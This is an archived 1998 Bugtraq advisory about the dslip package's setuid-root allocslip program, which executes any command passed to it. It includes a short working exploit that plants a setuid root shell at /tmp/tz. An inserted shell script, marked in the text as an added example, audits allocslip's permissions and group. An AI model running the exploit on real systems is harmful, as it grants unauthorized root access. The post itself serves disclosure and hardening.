[7197] in bugtraq
dslip package
daemon@ATHENA.MIT.EDU (David Kopstain)
Thu Jul 9 16:01:09 1998
Date: Thu, 9 Jul 1998 01:34:20 -0700
Reply-To: David Kopstain <taz@SIMPLENET.COM>
From: David Kopstain <taz@SIMPLENET.COM>
To: BUGTRAQ@NETSPACE.ORG
In the README file for the dslip package, it clearly states:
Those people who are allowed to turn on and off SLIP lines should be
put in the slip group. NOBODY except user slip should be allowed in
the slipown group since it effectively allows root access (since the
dialin/dialout scripts must be run as root).
The package advises installing the program 'allocslip' like so:
-rwsr-x--- 1 root slipown 9220 Aug 4 11:15 allocslip*
If you follow the instructions, then only users in group slipown
can run this program and you're only at _their_ mercy. But if you allow
anyone to run this program on your machine, and it's setuid root as
advised, then something as easy as this will compromise root.
--- cut ---
#!/bin/sh
cat > /tmp/sg << EOF
#!/bin/sh
cp /bin/sh /tmp/tz
chown root /tmp/tz
chmod 4755 /tmp/tz
EOF
chmod +x /tmp/sg
allocslip /tmp/sg
--- eof ---
allocslip simply follows any command you give it as arg 1. So take
the above shell script, run it, then look for your handy root shell at
/tmp/tz.
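The README's install advice quoted above, turned into a check an admin can run against the box. This is an added example, not part of the original post or the dslip package; the function names and the sample ls -l and /etc/group lines are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post or the dslip package: audits the
# README's install advice. allocslip must be setuid root, group slipown, mode
# -rwsr-x--- (no world access), and slipown must hold nobody but user slip.

# check_allocslip_line "<one line of ls -l output>"
# Returns 0 for -rwsr-x--- root slipown; otherwise prints why and returns 1.
check_allocslip_line() {
    read -r mode links owner group rest <<EOF
$1
EOF
    suid=$(printf '%s\n' "$mode" | cut -c4)      # s/S when the setuid bit is on
    others=$(printf '%s\n' "$mode" | cut -c8-10) # rwx triplet for everyone else
    if [ "$suid" != "s" ] && [ "$suid" != "S" ]; then
        echo "allocslip is not setuid ($mode)" >&2; return 1
    fi
    if [ "$owner" != "root" ]; then
        echo "allocslip is not owned by root ($owner)" >&2; return 1
    fi
    if [ "$group" != "slipown" ]; then
        echo "allocslip group is $group, not slipown" >&2; return 1
    fi
    if [ "$others" != "---" ]; then
        echo "allocslip is reachable by everyone (others=$others): any user gets root" >&2; return 1
    fi
    return 0
}

# check_slipown_group "<slipown line from /etc/group>"
# Returns 0 when the member list is empty or exactly 'slip'.
check_slipown_group() {
    members=$(printf '%s\n' "$1" | cut -d: -f4)
    case "$members" in
        ""|slip) return 0 ;;
        *) echo "slipown has members other than slip: $members" >&2; return 1 ;;
    esac
}

# Constructed sample input: the README's line, a world-executable install, two group lines.
GOOD_LS='-rwsr-x--- 1 root slipown 9220 Aug 4 11:15 allocslip*'
BAD_LS='-rwsr-xr-x 1 root root 9220 Aug 4 11:15 allocslip*'
GOOD_GRP='slipown:x:105:slip'
BAD_GRP='slipown:x:105:slip,bob'
for line in "$GOOD_LS" "$BAD_LS"; do
    if check_allocslip_line "$line"; then echo "OK:   $line"; else echo "FAIL: $line"; fi
done
for line in "$GOOD_GRP" "$BAD_GRP"; do
    if check_slipown_group "$line"; then echo "OK:   $line"; else echo "FAIL: $line"; fi
done
```

On a live system, feed it `ls -l "$(command -v allocslip)"` and `grep '^slipown:' /etc/group` instead of the constructed lines.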
The buffer overflow previously mentioned is of no real concern
then since we can already execute whatever we want. And the reason some
people can't make this program do exactly what they want (i.e. call
system_script() so they can execute whatever they want), is because they
must have compiled in the slip option in the networking options of the
kernel.
Moral of the story: read the manual. Don't be a dumbshit and
install software without reading exactly what you're doing.
-taz